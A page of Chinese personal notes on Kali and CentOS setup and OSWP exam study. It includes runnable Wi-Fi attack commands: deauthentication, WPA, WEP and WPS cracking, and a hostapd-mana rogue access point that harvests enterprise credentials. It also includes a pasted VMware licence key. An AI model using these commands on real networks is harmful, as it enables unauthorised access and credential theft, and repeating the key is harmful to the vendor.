安全运营
- aa
- aa
- aa
1
- kali2022
- Kali 1.0 基于 Debian Wheezy。 Kali 2.0 基于 Jessie。 Kali 滚动基于 Debian 测试。
- 实时模式启动到 RAM,安装的 Kali 实例启动到存储设备。
- 实时模式启动至 RAM,但可能会自动挂载磁盘。 取证模式不会自动安装驱动器。
- 使用 mount命令验证是否未安装任何磁盘。 您还可以对系统的交换和磁盘设备进行 MD5,重新启动到取证模式并再次进行 MD5。 如果取证模式成功,MD5 哈希值应该匹配。 在您不关心“污染”的系统中尝试一下!
- 请求添加工具的最佳方式是在 Kali Bug Tracker 中打开“新工具请求”票证。
- Kali 中一些很酷的功能,实时系统、取证模式、自定义 Linux 内核、完全可定制、默认禁用网络服务的可信操作系统、ARM 支持、预装安全工具、渗透测试平台!
- 当您想要实现以下目的时,Kali Live 非常有用: 将 Kali 的便携式副本放在口袋里; 无需对计算机进行任何更改即可测试 Kali Linux; 需要启用取证模式。 使用 Kali live 作为任何类型的永久安装都是一个坏主意,特别是如果您希望保存更改(没有持久性!)或者启动计算机上的内存有限。
- Kali(和 Debian)ISO 是一个 isohybrid 。 构建 ISO 后, syslinux 实用程序会运行 isohybrid ISO 上的命令,将分区表添加到 ISO,同时仍保持其有效的 ISO 文件。
- kali2022安装使用vm
- 登录账户并访问下载 https://customerconnect.vmware.com/cn/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/17_0
- sh Mware-Workstation-Full.bundle
- JU090-6039P-08409-8J0QH-2YR7F
- vmware status
- vmware start
- nohup rdesktop -r sound:remote -r disk:share_name=/root/XXX/123 ip > /dev/null 2>&1 &
- kali2022安装docker
- apt-get install docker.io docker-compose
- service docker start
- systemctl enable docker
- kali2022开启蓝牙
- sudo service bluetooth start
- kali2022查看网卡型号
- lspci -v | grep “Network controller”
- kali2022安装cpulimit并限制占用率为80%
- sudo apt-get install cpulimit
- 查pid
ps aux | grep 进程名
-nohup cpulimit –pid XXX –limit 80 > /dev/null 2>&1 &
- kali2022温控
- sudo apt-get install lm-sensors psensor
- sudo sensors_detect 授权其传感器 全部yes
- sensors 查看温度相关信息
- gui打开psensor 查看温度相关信息
- kali2022安装并切换java版本
- https://www.oracle.com/java/technologies/downloads/#java8
- 登录oracle共享账户并下载
- mv jdk-8u361-linux-x64.tar.gz /opt
- cd /opt
- tar -zxvf jdk-8u361-linux-x64.tar.gz
- vi /etc/profile 在最后一行添加
rt JAVA_HOME=/opt/jdk1.8.0_361
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH - source /etc/profile
- update-alternatives –install /usr/bin/java java /opt/jdk1.8.0_361/bin/java 1
- update-alternatives –install /usr/bin/javac javac /opt/jdk1.8.0_361/bin/javac 1
- update-alternatives –set java /opt/jdk1.8.0_361/bin/java
- update-alternatives –set javac /opt/jdk1.8.0_361/bin/javac
- update-alternatives –config java
- java -version
- kali2022安装内核头
- apt-get install linux-headers-$(uname -r)
- kali2022安装输入法
- apt-get install fcitx
- apt-get install fcitx-googlepinyin
- im-config 配件输入源和键盘
- 重启后才能正常打字(ctrl+空格)
- kali2022安装截图工具
- apt-get install shutter
- 配置快捷键 命令shutter -s 开启截图
- kali2022火狐firefox中文插件包
- kali2022代理
- https://github.com/v2fly/v2ray-core/releases/tag/v4.45.2
- https://github.com/Qv2ray/QvPlugin-Trojan/releases
- https://github.com/Qv2ray/Qv2ray/releases/tag/v2.7.0
- /root/.config/qv2ray/vcore/ 最高支持V2Ray 4.45.2
- mkdir -p home/.config/qv2ray/plugins 可添加插件QvPlugin-Trojan.v3.0.0.linux-x64.so
- kali2022安装wps
- 下载https://linux-bucket.ks3-cn-beijing.ksyun.com/wps/download/ep/Linux2019/11691/wps-office_11.1.0.11691_amd64.deb
- dpkg -i XX.deb
- 国内字体ttf下载链接:http://xiazaiziti.com/?s=wingding+3 自行搜索下载所缺失的字体
- 复制win系统的C:\Windows\Fonts 到/usr/share/fonts/wps-office/
- 请各位小伙伴们,详细阅读公司网络使用注意事项。
- 近期服务部开展公司网络安全隐患检查,下列操作请注意。
1.公司电脑主机需要8位以上复杂登陆密码,不得私自插入U盘,有需求请上报批准。
2.不得利用公司电脑私自开启wifi热点分享,密码等信息不得发给非工作人员,有需求请上报批准。
3.禁止浏览赌博和色情网站,有需求请上报批准。
4.禁止私自搭建VPN及隧道通向公司外部,或者从公司外连接到工作电脑,不能安装来历不明的程序,有需求请上报批准。
5.电脑应该开启防火墙,及时更新系统补丁。
6.个人离开电脑应该锁屏。
- centos 7.9在线安装docker
- curl -fsSL https://get.docker.com | bash -s docker –mirror aliyun
- yum -y install docker
- sudo yum install docker
- sudo systemctl start docker
- sudo systemctl enable docker
- docker version
- docker images
- docker image rm IMAGE_ID
- docker ps -a
- docker start ID
- docker restart ID
- docker update –restart=always CONTAINER_ID
- docker exec it ID bash
- centos 7.9离线安装docker
- wget –no-check-certificate https://link.storjshare.io/s/juljeuqy6xuu37krtgskmuvw73aq/ydisk/offline-setup-docker-centos7.9.tar.gz?download=1 -O offline-setup-docker-centos7.9.tar.gz
- tar -zxvf offline-setup-docker-centos7.9.tar.gz
- yum localinstall ./文件夹名/*.rpm
- centos 7.9启动docker并设置开机启动
- systemctl enable docker.service
- systemctl start docker.service
- centos 7.9离线安装python3
- wget –no-check-certificate https://link.storjshare.io/s/jwrjcsg2xushuxpkz5eyuqs7ijeq/ydisk/offline-setup-python3-centos7.9.tar.gz?download=1 -O offline-setup-python3-centos7.9.tar.gz
- tar -zxvf offline-setup-python3-centos7.9.tar.gz
- yum localinstall ./文件夹名/*.rpm
- centos 7.9防火墙开端口
- sudo firewall-cmd –zone=public –add-port=80/tcp –permanent
- sudo firewall-cmd –reload
- sudo firewall-cmd –list-ports
- centos7.9安装kvm
- lscpu | grep Virtualization
- sudo yum install @virt
- sudo yum install virt-top libguestfs-tools virt-install virt-viewer
- yum -y install qemu-kvm libvirt virt-install bridge-utils
- sudo yum -y install virt-manager
- sudo systemctl start libvirtd.service
- sudo systemctl enable libvirtd.service
- yum install cockpit
- systemctl enable –now cockpit.socket
- yum install cockpit-machines
- yum install -y cockpit-docker
- yum install -y cockpit-kubernetes
- yum install -y cockpit-storaged
- systemctl enable –now cockpit.socket
- kvm完整克隆并设置开机启动
- virsh list –all
- virt-clone –auto-clone -o name -n new_name
- virsh autostart name
- kvm导入 完整克隆
- xml文件和qcow2文件 都放到home目录下
- virsh define –file /home/name.xml
- centos 7.9配置静态ip
- vi /etc/sysconfig/network-scripts/ifcfg-eth0
- BOOTPROTO=“static”
DNBOOT=yes
IPADDR=192.168.1.2
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
DNS1=114.114.114.114 - service network restart
- centos7.9安装系统命令
- yum -y install wget
- yum install net-tools.x86_64
- yum install -y lrzsz
- 悦库网盘
- wget https://pkg.aimicloud.com/ydisks_docker_x64.tar.gz
- tar -zxvf ydisks_docker_x64.tar.gz
- cd ydisks
- sudo chmod 744 setup.py
- sudo ./setup.py
- https://ydisk.cn/docs/#/md/deploy/linux
- centos7.9 npc穿透内网
- wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
- tar -zxvf linux_amd64_client.tar.gz
- nohup ./npc -server=ip:port -vkey=XXX -type=tcp &
- systemctl enable npc
- centos7.9挂载磁盘
- fdisk -l
- df -TH
- umount /dev/vdb
- mount /dev/vdb /home/
- KVM扩容centos 7.9内存 cpu 磁盘
- 物理机下
virsh edit name
<memory unit=‘KiB’>16777216</memory>
<currentMemory unit=‘KiB’>16777216</currentMemory>
<vcpu placement=‘static’>16</vcpu> - 物理机下进入qcow2存放目录
qemu-img resize name.qcow2 +100G - 虚拟机下
fdisk -l 获取到 磁盘名字 /dev/vda
fdisk /dev/vda
n
p
默认
w
fdisk /dev/vda
t
默认
8e
w
partprobe
pvcreate /dev/vda3
vgdisplay 获取到 VG Nmae 为 centos
vgextend centos /dev/vda3
vgdisplay
lvresize -L +100G /dev/centos/home
xfs_growfs /dev/mapper/centos-home
df -h
- centos7.9部署masscan
- yum install git gcc make libpcap-devel clang
- cd /opt
- git clone https://github.com/robertdavidgraham/masscan.git
- cd /masscan
- make
- vi /etc/profile
最后一行添加
PATH=/opt/masscan/bin:$PATH
export PATH - source /etc/profile
- Ubuntu 18.04.6部署Rocket.Chat
- lsb_release -a
- systemctl status snapd.service
- snap install core
- snap install rocketchat-server
- sudo systemctl restart snap.rocketchat-server.rocketchat-server.service
- sudo systemctl restart snap.rocketchat-server.rocketchat-caddy.service
- sudo service snap.rocketchat-server.rocketchat-server status
- systemctl enable rocketchat.service
- systemctl start rocketchat.service
- systemctl enable mongod.service
- sudo ufw status
- systemctl stop snapd.service
- systemctl disable snapd.service
- vulfocus靶场部署
- https://fofapro.github.io/vulfocus/#/INSTALL?id=普通docker镜像安装
- docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxx.xxx.xxx.xxx -e EMAIL_HOST=“xxx.xxx.xxx” -e EMAIL_HOST_USER=“xxx@xxx.com” -e EMAIL_HOST_PASSWORD=“xxxxxxxx” vulfocus/vulfocus
- 后台运行命令
- nohup command > /dev/null 2>&1 &
- 240103
- 监考手册 https://help.offsec.com/hc/en-us/articles/360050299352
- 监考平台 https://proctoring.offensive-security.com/student/login
- 监考test平台 https://proctoring.offensive-security.com/Student/TestExam
- OSID和MD5(考前一天通过邮件接收) proctoring@offensive-security.com
- klcp考试指南 https://help.offsec.com/hc/en-us/articles/360059125211
- oswp考试指南https://help.offsec.com/hc/en-us/articles/360046904731
- 考点 https://www.classmarker.com/
- 常见问题
https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams
https://help.offsec.com/hc/en-us/requests/new - 上传报告 https://upload.offsec.com/
- 确定设备的驱动程序和详细信息
- sudo airmon-ng
- sudo lsusb -vv
- **列出Driver参数 **
- sudo modinfo ath9k_htc
- 列出所有已加载的模块以及 每个模块的依赖关系
- lsmod
- 加载 ath9k_htc 并禁用 闪烁 LED
- sudo modprobe ath9k_htc blink=0
- 删除模块 依赖关系
- sudo rmmod ath
- sudo rmmod ath9k_htc ath9k_common ath9k_hw ath
- iw
- sudo iwlist wlan0 frequency 显示可用的 频道/频率
- sudo iw list 显示详细信息 无线接口信息
- sudo iwconfig wlan1 检查频率/频道
- sudo iw dev wlan0 scan | grep SSID 解析 iw 列出可用的 SSID 扫描输出
- sudo iw dev wlan0 scan | egrep “DS Parameter set|SSID:” 列出可用的 SSID 和 通过解析 iw 扫描输出的通道
- sudo iw dev wlan0 interface add wlan0mon type monitor 添加单独的监视模式 接口,称为 wlan0mon,链接到 wlan0
- sudo ip link set wlan0mon up 启动新创建的 wlan0mon
- sudo iw dev wlan0mon info 从 iw 获取信息 监控模式界面
- sudo tcpdump -i wlan0mon 使用 tcpdump 测试监控模式
- sudo iw dev wlan0mon interface del 删除监控模式 VAP
- sudo iw reg get 获取监管域信息
- vi /etc/default/crda,填写 REGDOMAIN=US 更改或设置监管域
- **rfkill **
- sudo rfkill list 列出RF模块
- sudo rfkill list 1 列出禁用的RF模块
- sudo rfkill block 1 禁用设备1
- sudo rfkill unblock 1 解锁设备1
- sudo rfkill block all 禁用所有无线设备
- Aircrack-ng
- 显示状态 以及有关系统上无线接口的信息 sudo airmon-ng
- 检查网络管理器 sudo airmon-ng check
- 终止影响网卡的其余进程 sudo airmon-ng check kill
- 启用监控模式wlan1模式 sudo airmon-ng start wlan1
- 停用监控模式wlan1模式 sudo airmon-ng stop wlan1
- 启用监视器wlan1模式,通道 3 sudo airmon-ng start wlan1 3
- 输出关于系统和安装的无线网卡 详细信息 sudo airmon-ng –verbose
- 输出更多来自系统命令的详细信息 sudo airmon-ng –debug
- 仅捕获通道 2 上的数据包 sudo airodump-ng wlan1 -c 2
- 精准捕获数据包输出到 cap1 文件 sudo airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w cap1 wlan1
- 输出的文件扩展名 sudo airodump-ng –output-format csv,pcap wlan1
- 注入测试 sudo aireplay-ng -9 wlan1
- 接入点和无线网卡锁定在10信道上 iwconfig wlan1 channel 10
- 精准注入测试 sudo aireplay-ng -9 -e wifi名 -a 34:08:04:09:3D:38 wlan1
- sudo aireplay-ng -0 1 -a MAC地址(bssid) -c ESSID wlan1
- 卡对卡注入测试 sudo aireplay-ng -9 -i wlan1 wlan0
- CPU 上的基准测试 aircrack-ng -S
- 从捕获的文件中过滤其他 AP sudo airdecap-ng -b 34:08:04:09:3D:38 opennet-01.cap
- wget http://standards-oui.ieee.org/oui.txt
输出客户端与 AP 关系图 airgraph-ng -o Picture1_png -i dump-01.csv -g CAPR - 输出客户探针图 airgraph-ng -o Picture2.png -i dump-01.csv -g CPG
- 列出包含以下内容的所有行 “密码” grep -i password /usr/share/john/password.lst
- vi /etc/john/john.conf
JtR 添加两个修改规则
$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9] - john –wordlist=/usr/share/john/password.lst –rules –stdout | grep -i Password123 测试重整规则 JtR
- john –wordlist=/usr/share/john/password.lst –rules –stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap 结合 JtR 修改规则和 通过管道将其连接到aircrack-ng
- crunch 8 9 生成单词列表 单词长度在 8 到 9 个字符之间的所有可打印字符
- crunch 8 9 abc123 用生成单词列表 字符集 abc123,单词长度在 8 到 9 个字符之间
- crunch 11 11 -t password%%% 生成 以密码开头、以四位数字结尾的单词列表
- crunch 11 11 0123456789 -t password@@@ 生成 以“密码”开头并以四位数字结尾的单词列表 - 替代版本
- crunch 1 1 -p abcde12345 生成单词列表 使用“abcde12345”中的字符而不重复其中任何一个
- crunch 1 1 -p dog cat bird 生成 包含多个单词而不是字符的单词列表,不重复 他们
- crunch 5 5 -t ddd%% -p dog cat bird 成包含多个单词而不是字符的单词列表,无需 重复它们并添加两位数字
- crunch 5 5 aADE -t ddd@@ -p dog cat bird 生成 来自多个单词的非重复单词列表并添加两个字符 来自定义的字符集
- crunch 11 11 -t password%%% | aircrack-ng -e wifu crunch-01.cap -w - 将 Crunch mangling 与 通过管道将其连接到aircrack-ng
- echo bird > wordlist.txt
echo cat » wordlist.txt
echo dog » wordlist.txt
rsmangler –file wordlist.txt
rsmangler –file wordlist.txt –output mangled.txt RSMangler 输出到文件 - cat wordlist.txt | rsmangler –file - 连接到 RSMangler 的单词列表
- rsmangler –file wordlist.txt –min 12 –max 13 用修改单词列表 RSManger 并限制为 12-13 个字符
- rsmangler –file wordlist.txt –min 12 –max 13 | aircrack-ng -e wifu rsmangler-01.cap -w - 组合 RSMangler 重整 并将其通过管道传输到 Aircrack-ng
- hashcat -I 显示设备属性
- hashcat -b -m 2500 基准测试
- sudo apt install hashcat-utils 安装 hashcat 实用程序
- /usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx 将 PCAP 转换为 hashcat 的 hccapx
- hashcat -m 2500 output.hccapx /usr/share/john/password.lst 使用 hashcat 进行破解
- echo wifu > essid.txt 将目标 ESSID 添加到文件
airolib-ng wifu.sqlite –import essid essid.txt 导入 ESSID Airolib-NG
airolib-ng wifu.sqlite –stats 查看 airolib-ng 数据库 统计数据
airolib-ng wifu.sqlite –import passwd /usr/share/john/password.lst 将密码导入到 airolib-ng 数据库
airolib-ng wifu.sqlite –batch 为 ESSID 生成 PMK
aircrack-ng -r wifu.sqlite wpa1-01.cap 恢复 WPA 密码 airolib-ng 数据库 - genpmk -f /usr/share/john/password.lst -d wifuhashes -s wifu 创建预先计算的哈希表
cowpatty -r wpajohn-01.cap -d wifuhashes -s wifu 使用预先计算的哈希表
- WPA/WPA2企业网络
- 终止影响网卡的其余进程 sudo airmon-ng check kill
- 启用监控模式 sudo airmon-ng start wlan0mon
- 收集wifi信息(MGT为企业网络) sudo airodump-ng wlan0mon
- 抓握手包(保持运行直到抓取成功后停止) sudo airodump-ng -c 2 -w wifi名 wlan0mon
- 导致wifi重连 sudo aireplay-ng -0 1 -a MAC地址(BSSID) -c ESSID wlan0mon
- 停用监控模式 sudo airmon-ng stop wlan0mon
- 打开cap包 sudo wireshark wifi名-o1.cap
- 过滤地址 wlan.bssid==xxxxx && eap && tls.handshake.certificate
- 打开Extensible Authentication Protocol-Transport Layer Security-Certificate-Handshake Protocol-Certificate-两串长字符-右击第一串长字符-点击Export保存为cert.der
- 看证书的Issuer和Subject openssl x509 -inform der -in cer.der -text
- 输出crt openssl x509 -inform der -in cer.der -outform pem -out output.crt
- 查看crt cat output.crt
-安装开源的 RADIUS 服务器 sudo apt install freeradius - 修改ca文件的50-55行 sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = ca@playtronics.com
commonName = “Playtronics Certificate Authority” - 修改server文件的49-54行 sudo mousepad /etc/freeradius/3.0/certs/server.cnf
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = admin@playtronics.com
commonName = “Playtronics” - 进cnf目录编译
sudo -s
cd /etc/freeradius/3.0/certs/
rm dh
make
exit - 安装 hostapd-mana sudo apt install hostapd-mana
- 修改conf文件 sudo mousepad /etc/hostapd-mana/hostapd-mana.conf
ssid=Playtronics
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
eap_user_file= /etc/hostapd-mana/hostapd-mana.eap_user
mana_credout=/tmp/hostapd.credout - 查看eap_user文件并包含以下内容 sudo mousepad /etc/hostapd-mana/hostapd-mana.eap_user
-
PEAP,TTLS,TLS,FAST
“t” TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 “pass” [2]
- 启动hostapd-mana sudo hostapd-mana /etc/hostapd-mana/hostapd-mana.conf
username:cosmo
password:123456
提取asleep后面的字符串 - 跑asleep后面的字符串获取明文密码 asleep -C xxxxxxx -W /usr/share/john/password.lst
- 查看credout文件 cat /tmp/hostapd.credout
- 手动连接 wpa_supplicant -c
前台连接 sudo wpa_supplicant -i wlan0 -c wifi-client.conf
后台连接 sudo wpa_supplicant -i wlan0 -c wifi-client.conf -B
sudo dhclient wlan0
连接到WPA/WPA2企业的wifi-client.conf
network={
ssid=“NetworkName”
scan_ssid=1
key_mgmt=WPA-EAP
identity=“Domain\username”
password=“password”
eap=PEAP
phase1=“peaplabel=0”
phase2=“auth=MSCHAPV2”
}
- WEP网络
- 终止冲突进程 sudo airmon-ng check kill
- 启动监控模式 sudo airmon-ng start wlan0
- 扫描 WEP 网络 sudo airodump-ng wlan0mon –encrypt WEP
- 捕获 besside-ng -c Channel -b BSSID wlan0mon
- 破解WEP密钥 aircrack-ng ./wep.cap
- 手动连接
sudo iwconfig wlan0 essidkey s:
sudo dhclient wlan0
连接到WEP的wifi-client.conf
network={
ssid=“hotel_wifi”
scan_ssid=1
}
- ** MAC 过滤的开放网络**
- 抓包 airodump-ng -w <CAPTURE_NAME> -c
–bssid - 获取MAC 地址 macchanger –show
- 虚假身份验证攻击 aireplay-ng -1 0 -e
-a -h <YOUR_MAC> - ARP重放攻击 aireplay-ng -3 -b
-h <YOUR_MAC> - 取消认证攻击 aireplay-ng -0 1 -a
-c <CLIENT_MAC>
-破解密码 aircrack-ng <CAPTURE_NAME>
- WPA/WPA2网络
- sudo airmon-ng check kill
- sudo airodump-ng wlan0
- sudo airodump-ng -c 目标AP的信道 -w 保存数据包的文件名 wlan0
- sudo aireplay-ng -a 目标AP的mac地址 -0 4 wlan0
连接到WPA-PSK 的wifi-client.conf
network={
ssid=“home_network”
scan_ssid=1
psk=“correct battery horse staple”
key_mgmt=WPA-PSK
}
- WPS网络
- sudo apt install airgeddon
- source /usr/share/airgeddon/known_pins.db
- 检查数据库中 BSSID 开头的 AP “0013F7”
echo ${PINDB[“0013F7”]} - 识别启用了 WPS 的接入点 wash -i
-s - 虚假身份验证攻击 aireplay-ng -1 0 -e
-a -h <YOUR_MAC> - 离线暴力破解 reaver -i wlan0 -b BSSID -SNLAvv -c 1 -K
- 在线暴力破解 reaver -i
-b -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>
- screen
- 列出cmd screen -ls
- 创建cmd但不接入 screen -S Hello -d -m
- 进入某个cmd screen -r Hello
- 从某个cmd切出来 Ctrl+a+d
- 杀死某个cmd screen -r Hello -X quit
- ssh
- ssh
@<target_ip> -p
- 备忘单
- https://liodeus.github.io/2020/10/29/OSWP-personal-cheatsheet.html?source=post_page-----2a1476233484--------------------------------
- https://github.com/alenperic/OSWP-Study-Guide
- http://www.nnnxxx.cn
- lab37.cn
- 视频演示 https://attackdefense.com/listingnoauth?labtype=wifi-security-basics&subtype=wifi-security-basics-ap-client-basics
- https://github.com/brcyrr/OSWP/blob/main/1%20-%20Aircrack-ng%20Essentials
- 重启网络管理器
- systemctl restart NetworkManager.service
- ttyd拒绝连接
- vi /etc/init.d/ttyd
- #${interface:+-i $interface} \
- qwrt芝麻开门
- echo 0xDEADBEEF > /etc/config/google_fu_mode
- sd
- sys